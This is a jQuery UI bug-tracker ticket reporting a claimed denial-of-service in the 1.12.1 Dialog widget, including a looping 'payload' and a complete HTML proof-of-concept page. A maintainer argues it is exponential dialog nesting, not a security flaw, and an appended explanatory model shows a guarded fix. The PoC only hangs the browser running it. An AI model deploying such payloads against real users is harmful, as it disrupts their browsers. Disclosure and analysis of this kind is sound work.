
#15390 new bug

Opened November 25, 2020 07:38PM UTC

Last modified January 29, 2021 09:34AM UTC

Denial of Service (DoS) - jQuery UI 1.12.1 - Dialog

Reported by: rafaelcintralopes
Owned by:
Priority: major
Milestone: none
Component: ui.dialog
Version: 1.12.1
Keywords:
Cc:
Blocked by:
Blocking:
Description

When we inject the "dialog" for any HTML tag, more than once, the browser and the application crash, closing the application.

**Payload:**

```javascript
for (var i = 0; i < 10; i++) {
    $("div").dialog({title:'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'});
}
```

**PoC:**

Create an HTML file with the following code or insert the Payload above in a vulnerable environment:

```html
<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>DoS - jQuery UI 1.12.1</title>
</head>
<body>
    <h2>DoS - jQuery UI 1.12.1</h2>

    <div>
        <button onclick="exploit()">Exploit</button>
    </div>

    <p>PoC by Rafael Cintra Lopes</p>

    <script src="https://code.jquery.com/jquery-3.5.1.min.js" integrity="sha256-9/aliU8dGd2tb6OSsuzixeV4y/faTqgFtohetphbbj0=" crossorigin="anonymous"></script>
    <script src="https://code.jquery.com/ui/1.12.1/jquery-ui.min.js" integrity="sha256-VazP97ZCwtekAsvgPBSUwPFKdrwD3unUfSGVYrahUqU=" crossorigin="anonymous"></script>

    <script>
        function exploit(){
            for (var i = 0; i < 10; i++) {
                $("div").dialog({title:'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'});
            }
        }
    </script>
</body>
</html>
```
Attachments (0)
Change History (3)

Changed November 25, 2020 07:39PM UTC by rafaelcintralopes comment:1

priority: minor → major

Changed January 22, 2021 08:55AM UTC by adriaon comment:2


https://snyk.io/vuln/SNYK-JS-JQUERYUI-1052825

Is work being done on this one? Cheers.

Changed January 29, 2021 09:32AM UTC by xfix comment:3


Not a security vulnerability in my opinion (this issue was reported as CVE-2020-28488) or even a bug for that matter. You are just spawning dialogue boxes in dialogue boxes - dialogue boxes themselves are made of divs which leads to exponential growth of dialogue boxes as you are spawning a dialogue box for each div in the document.
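The growth described in the comment above can be checked without a browser. The following is an added example, not code from the ticket or from jQuery UI: it models the document as a list of `div` records and models `$(selector).dialog()` as "initialise every matched div that is not already a dialog, and add the wrapper divs the widget builds". The number of wrapper divs per dialog (`WRAPPER_DIVS_PER_DIALOG`) and the record shape are assumptions made for the model; the real widget's exact markup differs, but any value of one or more gives the same exponential shape. The second function shows the application-side fix: target one element and skip re-initialisation, which keeps the count flat.

```javascript
// Added example (not from the ticket). Assumption: each dialog
// initialisation adds WRAPPER_DIVS_PER_DIALOG new <div> elements to the
// document, standing in for the div-based chrome jQuery UI builds.
const WRAPPER_DIVS_PER_DIALOG = 2;

// A div is modelled as { initialised: boolean } (constructed model, not a DOM node).
function newDiv() {
  return { initialised: false };
}

// Model of `$(matched).dialog()`: the widget factory is idempotent per
// element, so already-initialised divs are skipped; every newly
// initialised div contributes its wrapper divs to the document.
// Returns the number of divs created by this call.
function dialogAll(divs, matched) {
  const created = [];
  for (const d of matched) {
    if (d.initialised) continue;
    d.initialised = true;
    for (let i = 0; i < WRAPPER_DIVS_PER_DIALOG; i++) created.push(newDiv());
  }
  divs.push(...created);
  return created.length;
}

// The ticket's loop: `$("div")` re-matches every div in the document on
// each iteration, including the wrappers the previous iteration created.
// Returns the total div count after each iteration.
function runPayloadModel(iterations, initialDivs = 1) {
  const divs = Array.from({ length: initialDivs }, newDiv);
  const counts = [];
  for (let i = 0; i < iterations; i++) {
    // Snapshot the matched set first, as jQuery does before calling the widget.
    dialogAll(divs, divs.slice());
    counts.push(divs.length);
  }
  return counts;
}

// Remediation on the application side: select the one element that is
// meant to become a dialog and do not initialise it twice (the real-world
// equivalent is an id selector plus a `.dialog("instance")` check).
function runGuardedModel(iterations) {
  const divs = [newDiv()];
  const target = divs[0];
  const counts = [];
  for (let i = 0; i < iterations; i++) {
    if (!target.initialised) dialogAll(divs, [target]);
    counts.push(divs.length);
  }
  return counts;
}

// With one starting div and two wrappers per dialog, the total after
// iteration i is 2^(i+1) - 1: 3, 7, 15, ... , 2047 after ten iterations.
console.log("ticket loop :", runPayloadModel(10).join(", "));
console.log("guarded loop:", runGuardedModel(10).join(", "));
```

The model makes the comment's point concrete: the tenfold loop is not the problem, the `div` selector is, because each iteration's matched set includes the chrome the previous iteration produced. Selecting by id and checking for an existing instance is the usual way to keep `.dialog()` calls idempotent in application code.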